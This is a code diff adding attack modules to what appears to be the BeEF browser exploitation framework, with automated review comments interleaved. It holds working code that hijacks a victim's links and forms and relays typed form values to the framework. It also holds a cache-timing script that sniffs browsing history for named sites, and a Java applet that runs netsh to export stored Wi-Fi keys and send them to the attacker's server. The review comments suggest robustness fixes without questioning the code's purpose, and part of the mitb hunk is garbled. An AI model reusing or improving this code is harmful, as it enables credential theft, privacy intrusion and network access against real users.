diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js
index bfad2b6d4..e3db90c00 100644
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -15,121 +15,198 @@ // beef.mitb = { - - cid: null, - curl: null, - - init: function(cid, curl){ - beef.mitb.cid = cid; - beef.mitb.curl = curl; - }, - - // Initializes the hook on anchors and forms. - hook: function(){ - beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);}); - beef.onclose.push(function(event) {beef.mitb.endSession();}); - var anchors = document.getElementsByTagName("a"); - var forms = document.getElementsByTagName("form"); - for(var i=0;i0 && i 0 && i < inputs.length - 1) query += "&"; + switch (inputs[i].type) { + case "submit": + break; + default: + query += inputs[i].name + "=" + inputs[i].value; + break; + } + } + e.preventdefault; + beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]); + history.pushState({ Be:"EF" }, "", form.action); + return false; + } + }, + + // Fetches a hooked form with AJAX + fetchForm:function (url, query, target) { + try { + var y = new XMLHttpRequest(); + y.open('POST', url, false, "beef", "beef"); + y.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + y.onreadystatechange = function () { + if (y.readyState == 4 && y.responseText != "") { + target.innerHTML = y.responseText; + setTimeout(beef.mitb.hook, 10); + } + } + y.send(query); + beef.mitb.sniff("POST: " + url + " [" + query + "]"); + return true; + } catch (x) { + return false; + } + }, + + // Fetches a hooked link with AJAX + fetch:function (url, target) { + try { + var y = new XMLHttpRequest(); + y.open('GET', url, false, "beef", "beef"); + y.onreadystatechange = function () { + if (y.readyState == 4 && y.responseText != "") { + + target.innerHTML = y.responseText; + setTimeout(beef.mitb.hook, 10); + } + } + y.send(null); + beef.mitb.sniff("GET: " + url); + return true; + } catch (x) { + window.open(url); + beef.mitb.sniff("GET [New Window]: " + url); + return false; + } + }, + + // Relays an entry to the framework + sniff:function (result) 
{ + try { + beef.net.send(beef.mitb.cid, beef.mitb.curl, result); + } catch (x) { + } + return true; + }, + + // Signals the Framework that the user has lost the hook + endSession:function () { + beef.mitb.sniff("Window closed."); + } +} \ No newline at end of file diff --git a/modules/browser/get_history/command.js b/modules/browser/get_history/command.js new file mode 100644 index 000000000..a7f286c19 --- /dev/null +++ b/modules/browser/get_history/command.js 
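Review bot: `fetch` and `fetchForm` both call `open(..., false, "beef", "beef")` with no comment on the last two arguments, which are the user and password parameters of `XMLHttpRequest.open`. As written, every link and form the hook re-requests is opened with the same fixed pair, and nothing says whether the destination is meant to receive it; if the browser offers it, it is a constant a site owner could match on in request logs. I would put a comment above each call, e.g. `// NOTE: "beef"/"beef" are open()'s user/password args; state why they are set`. Part of this hunk is unreadable on the page (the loops at the top of `hook` lost text), so this covers only the two visible `open` calls.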
@@ -0,0 +1,337 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + +var hidden_iframe = beef.dom.createInvisibleIframe(); +hidden_iframe.setAttribute('id','f'); +hidden_iframe.setAttribute('name','f'); +hidden_iframe.setAttribute('src','about:blank'); +hidden_iframe.setAttribute('style','opacity: 0.1'); + +var results = ""; +var tries = 0; + +var isIE = 0; +var isFF = 0; + +/******************************* + * SUB-MS TIMER IMPLEMENTATION * + *******************************/ +var cycles = 0; +var exec_next = null; + +function timer_interrupt() { + cycles++; + if (exec_next) { + var cmd = exec_next; + exec_next = null; + cmd(); + } +} + + +if (beef.browser.isFF() == 1) { + window.addEventListener('message', timer_interrupt, false); + + /**************** + * SCANNED URLS * + ****************/ + var targets = [ + { 'category': 'Social networks' }, + { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js', + 'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] }, + { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] }, + + { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz', + 
'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] }, + { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] }, + { 'category': 'Content platforms' }, + { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] }, + { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] }, + { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] }, + { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] }, + { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] }, + { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] }, + { 'category': 'Online media' }, + { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] }, + { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css', + 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] }, + { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] }, + { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] }, + { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] }, + { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] }, + { 'category': 'Commerce' }, + { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12', + 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] }, + { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] }, + { 'name': 'Amazon (US)', 'urls': [ 
'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] }, + { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] }, + { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] } + ]; + /************************* + * CONFIGURABLE SETTINGS * + *************************/ + var TIME_LIMIT = 5; + var MAX_ATTEMPTS = 2; +} +if (beef.browser.isIE() == 1) { + /**************** + * SCANNED URLS * + ****************/ + var targets = [ + { 'category': 'Social networks' }, + { 'name': 'Facebook', 'urls': [ 'http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png', + 'https://s-static.ak.facebook.com/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png' ] }, + { 'name': 'Twitter', 'urls': [ 'http://twitter.com/phoenix/favicon.ico', + 'https://twitter.com/phoenix/favicon.ico' ] }, + { 'name': 'LinkedIn', 'urls': [ 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png', + 'http://s3.licdn.com/scds/common/u/img/logos/logo_2_237x60.png', + 'http://s4.licdn.com/scds/common/u/img/logos/logo_132x32_2.png' ] }, + { 'name': 'Orkut', 'urls': [ 'http://static3.orkut.com/img/gwt/logo_orkut_default.png' ] }, + { 'name': 'Dogster', 'urls': [ 'http://a2.cdnsters.com/static/images/sitewide/logos/dsterBanner-sm.png' ] }, + { 'category': 'Content platforms' }, + { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/favicon-refresh-vfldLzJxy.ico' ] }, + { 'name': 'Hulu', 'urls': [ 'http://www.hulu.com/fat-favicon.ico' ] }, + { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/favicon.ico' ] }, + { 'name': 'Wikipedia (EN)', 'urls': [ 'http://en.wikipedia.org/favicon.ico' ] }, + { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/favicon.ico' ] }, + { 'category': 'Online media' }, + { 'name': 'New York Times', 'urls': [ 'http://css.nyt.com/images/icons/nyt.ico' ] }, + { 'name': 'CNN', 
'urls': [ 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/hdr-main.gif', + 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif' ] }, + { 'name': 'Slashdot', 'urls': [ 'http://slashdot.org/favicon.ico', + 'http://a.fsdn.com/sd/logo_w_l.png' ] }, + { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/favicon.ico' ] }, + { 'name': 'Fox News', 'urls': [ 'http://www.foxnews.com/i/redes/foxnews.ico' ] }, + { 'name': 'AboveTopSecret.com', 'urls': [ 'http://files.abovetopsecret.com/images/atssitelogo-f.png' ] }, + { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/IMG/wlogo.png' ] /* this session only */ }, + { 'category': 'Commerce' }, + { 'name': 'Diapers.com', 'urls': [ 'http://c4.diapers.com/Images/favicon.ico' ] }, + { 'name': 'Amazon (US)', 'urls': [ 'http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V169459313_.gif' ] }, + { 'name': 'eBay', 'urls': [ 'http://www.ebay.com/favicon.ico' ] }, + { 'name': 'Walmart', 'urls': [ 'http://www.walmart.com/favicon.ico' ] }, + { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/Nest/Newegg.ico' ] } + ]; + /************************* + * CONFIGURABLE SETTINGS * + *************************/ + + var TIME_LIMIT = 1; + var MAX_ATTEMPTS = 1; +} + + +function sched_call(fn) { + exec_next = fn; + window.postMessage('123', '*'); +} + + +/********************** + * MAIN STATE MACHINE * + **********************/ +var log_area; +var target_off = 0; +var attempt = 0; +var confirmed_visited = false; +var current_url, current_name; +var wait_cycles; +var frame_ready = false; +var start, stop, urls; + +/* The frame was just pointed to data:... at this point. Initialize a new test, giving the + frame some time to fully load. 
*/ +function perform_check() { + wait_cycles = 0; + if (beef.browser.isIE() == 1) { + setTimeout(wait_for_read, 0); + } + if (beef.browser.isFF() == 1) { + setTimeout(wait_for_read, 1); + } + +} + + +/* Confirm that data:... is loaded correctly. */ +function wait_for_read() { + if (wait_cycles++ > 100) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); + return; + } + if (beef.browser.isFF() == 1) { + if (!frame_ready) { + setTimeout(wait_for_read, 1); + } else { + document.getElementById('f').contentWindow.stop(); + setTimeout(navigate_to_target, 1); + } + } + if (beef.browser.isIE() == 1) { + try{ + if (frames['f'].location.href != 'about:blank') throw 1; + //if(document.getElementById('f').contentWindow.location.href != 'about:blank') throw 1; + document.getElementById("f").src ='javascript:""'; + setTimeout(wait_for_read2, 0); + } catch (e) { + setTimeout(wait_for_read, 0); + } + } +} + +function wait_for_read2() { + if (wait_cycles++ > 100) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=Something went wrong, sorry'); + return; + } + if (!frame_ready) { + setTimeout(wait_for_read2, 0); + } else { + setTimeout(navigate_to_target, 1); + } +} + + + +/* Navigate the frame to the target URL. */ +function navigate_to_target() { + cycles = 0; + if (beef.browser.isFF() == 1) { + sched_call(wait_for_noread); + } + if (beef.browser.isIE() == 1) { + setTimeout(wait_for_noread, 0); + } + urls++; + document.getElementById("f").src = current_url; +} + + +/* The browser is now trying to load the destination URL. Let's see if + we lose SOP access before we hit TIME_LIMIT. If yes, we have a cache + hit. If not, seems like cache miss. In both cases, the navigation + will be aborted by maybe_test_next(). 
*/ + +function wait_for_noread() { + try { + if (beef.browser.isIE() == 1) { + if (frames['f'].location.href == undefined){ + confirmed_visited = true; + throw 1; + } + if (cycles++ >= TIME_LIMIT) { + maybe_test_next(); + return; + } + setTimeout(wait_for_noread, 0); + } + if (beef.browser.isFF() == 1) { + if (document.getElementById('f').contentWindow.location.href == undefined) + { + confirmed_visited = true; + throw 1; + } + if (cycles >= TIME_LIMIT) { + maybe_test_next(); + return; + } + sched_call(wait_for_noread); + } + } catch (e) { + confirmed_visited = true; + maybe_test_next(); + } +} + +function maybe_test_next() { + frame_ready = false; + if (beef.browser.isFF() == 1) { + document.getElementById('f').src = 'data:text/html,'; + } + if (beef.browser.isIE() == 1) { + document.getElementById("f").src = 'about:blank'; + } + if (target_off < targets.length) { + if (targets[target_off].category) { + //log_text(targets[target_off].category + ':', 'p', 'category'); + target_off++; + } + if (confirmed_visited) { + log_text('Visited: ' + current_name + ' [' + cycles + ':' + attempt + ']', 'li', 'visited'); + } + if (confirmed_visited || attempt == MAX_ATTEMPTS * targets[target_off].urls.length) { + if (!confirmed_visited) + //continue; + log_text('Not visited: ' + current_name + ' [' + cycles + '+]', 'li', 'not_visited'); + confirmed_visited = false; + target_off++; + attempt = 0; + maybe_test_next(); + } else { + current_url = targets[target_off].urls[attempt % targets[target_off].urls.length]; + current_name = targets[target_off].name; + attempt++; + perform_check(); + } + } +} + + +/* Just a logging helper. */ +function log_text(str, type, cssclass) { + results+="
"; + results+=str; + //alert(str); + if(target_off==(targets.length-1)){ + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+results); + setTimeout(reload,3000); + } +} + +function reload(){ + //window.location.href=window.location.href; + window.location.reload(); +} + +/* Decides what to do next. May schedule another attempt for the same target, + select a new target, or wrap up the scan. */ + + + +/* The handler for "run the test" button on the main page. Dispenses + advice, resets state if necessary. */ +function start_stuff() { + if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) { + target_off = 0; + attempt = 0; + confirmed_visited = false; + urls = 0; + results = ""; + maybe_test_next(); + } + else { + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.'); + } +} + + +beef.execute(function() { + urls = undefined; + exec_next = null; + start_stuff(); +}); + + diff --git a/modules/browser/get_history/config.yaml b/modules/browser/get_history/config.yaml new file mode 100644 index 000000000..73f5b5d29 --- /dev/null +++ b/modules/browser/get_history/config.yaml 
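Review bot: `timer_interrupt` is registered for every `message` event and runs whatever is in `exec_next` without looking at the event, while `sched_call` posts with target origin `'*'`. Any other frame or window that posts a message to this page therefore advances the state machine and bumps `cycles`, which the Firefox branch of `wait_for_noread` compares with `TIME_LIMIT`. The handler should take the event and ignore anything it did not send itself, e.g. `function timer_interrupt(ev) {` followed by `if (ev.source !== window || ev.data !== '123') return;`. The string literals in `maybe_test_next` and `log_text` have lost markup on this page, so they are not covered here.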
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ get_history:
+ enable: true
+ category: "Browser"
+ name: "History Extraction"
+ description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
+ authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
+ target:
+ working: ["FF","IE"]
diff --git a/modules/browser/get_history/module.rb b/modules/browser/get_history/module.rb
new file mode 100644
index 000000000..9ffe12fa1
--- /dev/null
+++ b/modules/browser/get_history/module.rb
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+class Get_history < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['results'] = @datastore['results']
+ save content
+ end
+
+end
diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js new file mode 100644 index 000000000..54aec9505 --- /dev/null +++ b/modules/host/get_wireless_keys/command.js @@ -0,0 +1,30 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; + var applet_id = '<%= @applet_id %>'; + var applet_name = '<%= @applet_name %>'; + var output; + beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'wirelessZeroConfig' , + null, applet_archive, null); + output = document.Microsoft_Corporation.getInfo(); + if (output) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+output); + } + beef.dom.detachApplet('wirelessZeroConfig'); +}); + + diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml new file mode 100644 index 000000000..9529b4ec5 --- /dev/null +++ b/modules/host/get_wireless_keys/config.yaml 
@@ -0,0 +1,26 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_wireless_keys: + enable: true + category: "Host" + name: "Get Wireless Keys" + description: "This module will retrieve the wireless profiles from the target computer.
You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command netsh wlan add profile filename=\"exported_wlan_profiles.xml\".
After that, just launch and connect to the wireless network without any password prompt.

For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html" + authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] + target: + working: ["IE"] + user_notify: ["C", "S", "O", "FF"] diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb new file mode 100644 index 000000000..0a3f75be2 --- /dev/null +++ b/modules/host/get_wireless_keys/module.rb @@ -0,0 +1,35 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_wireless_keys < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar') + end + + def post_execute + content = {} + content['result'] = @datastore['result'].to_s + save content + f = File.open("exported_wlan_profiles.xml","w+") + f.write((@datastore['results']).sub("result=","")) + writeToResults = Hash.new + writeToResults['data'] = "Please import "+Dir.pwd+"/exported_wlan_profiles.xml into your windows machine" + BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults) + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar') + end + +end + 
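Review bot: `post_execute` in get_wireless_keys/module.rb opens `exported_wlan_profiles.xml` with `File.open(..., "w+")` and never closes the handle, and the text it writes arrives from the hooked browser unchecked. The write also calls `.sub` on a datastore value with no nil check, so a missing key raises before `unbind` runs and the jar stays published by the asset handler. Use the block form, `File.open(path, "w") { |f| f.write(data.to_s) }`, and put the `unbind` call in an `ensure` clause. The file lands in whatever directory the server was started from under a fixed name that every run overwrites; a comment should say so.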
diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.class b/modules/host/get_wireless_keys/wirelessZeroConfig.class
new file mode 100644
index 000000000..cb5a0838e
Binary files /dev/null and b/modules/host/get_wireless_keys/wirelessZeroConfig.class differ
diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.jar b/modules/host/get_wireless_keys/wirelessZeroConfig.jar
new file mode 100644
index 000000000..7bccf01b3
Binary files /dev/null and b/modules/host/get_wireless_keys/wirelessZeroConfig.jar differ
diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java
new file mode 100644
index 000000000..e0c349785
--- /dev/null
+++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java
@@ -0,0 +1,113 @@ +import java.io.*; +import java.util.*; +import java.net.*; +import java.applet.*; + +// Keith Lee +// Twitter: @keith55 +// http://milo2012.wordpress.com +// keith.lee2012[at]gmail.com + +public class wirelessZeroConfig extends Applet{ + public static String result = ""; + + public wirelessZeroConfig(){ + super(); + return; + } + public static String getInfo() { + return result; + } + + public void init() { + if (isWindows()) { + String osVersion= System.getProperty("os.version"); + if(osVersion.equals("6.0") || osVersion.equals("6.1")){ + result=getWindows(); + } + } else { + result = "OS is not supported"; + } + } + + public static String getWindows(){ + String cmd1 = "netsh wlan show profiles"; + String cmd2 = "netsh wlan export profile name="; + String keyword1 = "User profiles"; + String wlanProfileArr[]; + String wlanProfileName; + int match = 0; + int count = 0; + ArrayList profileList = new ArrayList(); + try { + //Get wlan profile names + Process p1 = Runtime.getRuntime().exec(cmd1); + BufferedReader in1 = new BufferedReader(new InputStreamReader(p1.getInputStream())); + String line = null; + //Checks if string match "User profiles" + while ((line = in1.readLine()) != null) { + //Checks if string match "User profiles" + if(match==0){ + if(line.toLowerCase().contains(keyword1.toLowerCase())){ + match=1; + } + } + if(match==1){ + if(count>1){ + //If string matches the keyword "User Profiles" + line = (line.replaceAll("\\s+$","").replaceAll("^\\s+", "")); + if(line.length()>0){ + wlanProfileName = (line.split(":")[1]).replaceAll("\\s+$","").replaceAll("^\\s+", "");; + profileList.add(wlanProfileName); + } + } + count+=1; + } + } + in1.close(); + } catch (IOException e) { } + + try{ + //Export WLAN Profile to XML file + for(Iterator iterator = profileList.iterator(); iterator.hasNext();){ + String profileName = iterator.next().toString(); + Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"'); + //Check if exported xml exists + 
File f = new File("Wireless Network Connection-"+profileName+".xml"); + if(f.exists()){ + //Read contents of XML file into results variable + FileInputStream fstream = new FileInputStream(f); + DataInputStream in2 = new DataInputStream(fstream); + BufferedReader br = new BufferedReader(new InputStreamReader(in2)); + String xmlToStr; + while((xmlToStr = br.readLine()) != null){ + result+=xmlToStr; + } + in2.close(); + } + } + } catch (IOException e) { + } + return result; + } + + public static boolean isWindows() { + String os = System.getProperty("os.name").toLowerCase(); + return (os.indexOf("win") >= 0); + } + + /** + public static void main(String[] args) { + if (isWindows()) { + String osVersion= System.getProperty("os.version"); + System.out.println(osVersion); + if(osVersion.equals("6.0") || osVersion.equals("6.1")){ + result=getWindows(); + } + } else { + result = "OS is not supported"; + } + System.out.println(result); + } + **/ +}
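Review bot: wirelessZeroConfig.java has no class or method documentation saying what it does on the host, and both `catch (IOException e) { }` blocks in `getWindows` are empty. From the visible code, `init` calls `getWindows` only when `os.version` is 6.0 or 6.1, and `getWindows` runs `netsh wlan show profiles`, then `netsh wlan export profile name=` per profile through `Runtime.exec`, and reads `Wireless Network Connection-<profile>.xml` from the current directory into the static `result`. A Javadoc block on the class should state those three effects (child `netsh` processes, XML files left in the working directory, contents returned through `getInfo`) and that the applet presumably needs permission to spawn processes. The readers are also not closed if `readLine` throws; a `finally` with `close()` would cover that.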